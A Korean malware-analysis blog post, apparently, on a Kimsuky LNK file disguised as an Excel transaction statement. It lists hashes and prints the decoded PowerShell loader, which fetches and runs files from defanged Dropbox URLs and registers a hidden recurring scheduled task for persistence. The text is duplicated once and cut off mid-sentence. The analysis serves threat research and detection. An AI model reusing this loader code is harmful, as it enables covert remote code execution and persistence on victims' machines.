김수키(Kimsuky) 에서 만든 거래명세서로 위장한 악성코드-거래명세서(2024,10,02)
Contents
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 거래명세서(2024,10,02)에 대해 글을 적어보겠습니다.
먼저 악성코드 해쉬값은 다음과 같습니다.
파일명:거래명세서 [2024.09].xlsx.lnk
사이즈:318,168 Bytes
MD5:cdb9a352597f10b8539d61c4b7f4d64c
SHA-1:8b6bf5f4ec7045386ee8a0335b7ab7059fe3cf9e
SHA-256:acbc775087da23725c3d783311d5f5083c93658de392c17994a9151447ac2b63
일단 해당 LNK 파일은 엑셀로 속이는 척하는 것을 볼 수가 있으며 안에 보면 Base64 로 인코딩이 돼 있는 것을 확인할 수가 있습니다.
Base64 디코딩
$hhh = Join-(P)ath ([System(.)IO.Path]::GetT(e)mpPath())
"Telegram(.)exe"; wget -Uri "hxxps://dl(.)dropboxuserconte
nt(.)com/scl/fi/slx06ol4j(m)jqn16icggin/.pptx?rlkey=lky2li
t(5)lpthkcscfnz3f91oa&st=gwpkys9h&dl=0" -OutFile $hhh; & $h
hh; $ppp = Join-Pa(t)h ($env:AppData) "chrome(.)ps1"; $str =
'$aaa = Join(-)Path ($env:AppData) "temp(.)ps1"; wget -Uri "
hxxps://dl(.)dropboxusercontent(.)com/scl/fi/nanwt6elsu(x)ziz
05hnlt4/cjfansgmlans1-x(.)txt?rlkey=l6gzro1r(s)wkqbk6tinxnkuyl
v&st=iv78c1cg&dl=0" -OutFile $aaa; & $aaa; Remo(v)e-Item -Path
$aaa -Force;'; $str | Out-(F)ile -FilePath $ppp -Encodi(n)g UTF
8; $action = New-S(c)heduledTaskAction -Execute 'PowerShell(.)e
xe' -Argument '-Wind(o)wStyle Hidden -nop -N(o)nInteractive -N
oProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path
($env:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger = New-Sch
eduledTaskTr(i)gger -Once -At (Get-Date).AddMinutes(5) -Repetit
ionInterval (New-TimeSpan -Minutes 30); $settings = New-Schedul
edTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "ChromeUpdate
TaskMachine" -Action $action -Trigger $trigger -Settings $settings; $aaa
= Join-Path ($env:AppData) "system_first.ps1"; wget -Uri "hxxps://dl(.)dr
opboxusercontent(.)com/scl/fi/3br2y8fin(0)jqgrunrq3mf/cjfansgmlans1-f(.)t
xt?rlkey=rxnknu51ncb5xgnj2lyxu0xyu&st=ohfmyo4p&dl=0"
-OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
인 것을 확인할 수가 있습니다.
악성코드 분석
1. Telegram.exe 다운로드 및 실행
Telegram.exe라는 파일을 Dropbox에서 다운로드 하여 임시 …
먼저 악성코드 해쉬값은 다음과 같습니다.
파일명:거래명세서 [2024.09].xlsx.lnk
사이즈:318,168 Bytes
MD5:cdb9a352597f10b8539d61c4b7f4d64c
SHA-1:8b6bf5f4ec7045386ee8a0335b7ab7059fe3cf9e
SHA-256:acbc775087da23725c3d783311d5f5083c93658de392c17994a9151447ac2b63
일단 해당 LNK 파일은 엑셀로 속이는 척하는 것을 볼 수가 있으며 안에 보면 Base64 로 인코딩이 돼 있는 것을 확인할 수가 있습니다.
Base64 디코딩
$hhh = Join-(P)ath ([System(.)IO.Path]::GetT(e)mpPath())
"Telegram(.)exe"; wget -Uri "hxxps://dl(.)dropboxuserconte
nt(.)com/scl/fi/slx06ol4j(m)jqn16icggin/.pptx?rlkey=lky2li
t(5)lpthkcscfnz3f91oa&st=gwpkys9h&dl=0" -OutFile $hhh; & $h
hh; $ppp = Join-Pa(t)h ($env:AppData) "chrome(.)ps1"; $str =
'$aaa = Join(-)Path ($env:AppData) "temp(.)ps1"; wget -Uri "
hxxps://dl(.)dropboxusercontent(.)com/scl/fi/nanwt6elsu(x)ziz
05hnlt4/cjfansgmlans1-x(.)txt?rlkey=l6gzro1r(s)wkqbk6tinxnkuyl
v&st=iv78c1cg&dl=0" -OutFile $aaa; & $aaa; Remo(v)e-Item -Path
$aaa -Force;'; $str | Out-(F)ile -FilePath $ppp -Encodi(n)g UTF
8; $action = New-S(c)heduledTaskAction -Execute 'PowerShell(.)e
xe' -Argument '-Wind(o)wStyle Hidden -nop -N(o)nInteractive -N
oProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path
($env:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger = New-Sch
eduledTaskTr(i)gger -Once -At (Get-Date).AddMinutes(5) -Repetit
ionInterval (New-TimeSpan -Minutes 30); $settings = New-Schedul
edTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "ChromeUpdate
TaskMachine" -Action $action -Trigger $trigger -Settings $settings; $aaa
= Join-Path ($env:AppData) "system_first.ps1"; wget -Uri "hxxps://dl(.)dr
opboxusercontent(.)com/scl/fi/3br2y8fin(0)jqgrunrq3mf/cjfansgmlans1-f(.)t
xt?rlkey=rxnknu51ncb5xgnj2lyxu0xyu&st=ohfmyo4p&dl=0"
-OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
인 것을 확인할 수가 있습니다.
악성코드 분석
1. Telegram.exe 다운로드 및 실행
Telegram.exe라는 파일을 Dropbox에서 다운로드 하여 임시 …
IoC
acbc775087da23725c3d783311d5f5083c93658de392c17994a9151447ac2b63
8b6bf5f4ec7045386ee8a0335b7ab7059fe3cf9e
cdb9a352597f10b8539d61c4b7f4d64c
8b6bf5f4ec7045386ee8a0335b7ab7059fe3cf9e
cdb9a352597f10b8539d61c4b7f4d64c